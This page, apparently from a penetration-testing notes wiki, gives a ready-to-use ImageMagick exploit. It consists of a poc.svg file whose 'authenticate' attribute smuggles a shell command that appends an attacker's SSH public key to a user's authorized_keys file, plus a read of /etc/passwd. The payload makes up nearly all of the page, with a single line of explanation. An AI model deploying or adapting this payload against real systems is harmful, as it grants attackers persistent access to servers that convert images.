ImageMagick

Create a file called poc.svg, and then when imagemagick converts the file it should run the command. In this instance, it creates an ssh .pub key in the target users ssh directory.

<image authenticate='ff" `echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCdHBQl4i+/MGveUW+oQazS2r9mNE8HcnfQPayA3GuOzVKWnlbK1IvKyr5tmJmvNRoI+NIqj1AiW3xaNoXeeS7huTArOopB/5/OLYZrZfCjE9INKvEIWI6TA/3App9z5NxChyLX/KhqEO9q1frZl9fD5W2zkCp1ZBpjGvDFmVRy70gdvTjj/A7BMIlhxmqTdHyXkB37jgdHgOTDaCmI6m/nBET0fyF30BR8NleV6zYvIHqAQMBtCaXRdNJvDGab+YLUgPpMzQbr6RO6QdepzHK9+uIQv43rVvR1s3hdjHaZXMVc0wkHMMm2DoHukxV8O2DvP3kMjvmgDsvSTkNx25xGDhTKXuBsOuGElTMYETazL5kyP0Jq4gs42TEbBvXr0zrcBD/dY5yog5p0/oRJcQodNPFmS+c6Y2otMr35KxM3pZhg9qhV1OCT9NrqupsGt55p7jqdohl5xI7CMIxBDkwm1YUb6hLBoQloVDIurAjeDY89rpYu1O4djFjouq4zV50= htb-leonteale@pwnbox-base" >> /home/thomas/.ssh/authorized_keys`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">       
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

PreviousVulnerabilities NextCVE-2021-3560 (PolKit)

Last updated 1 year ago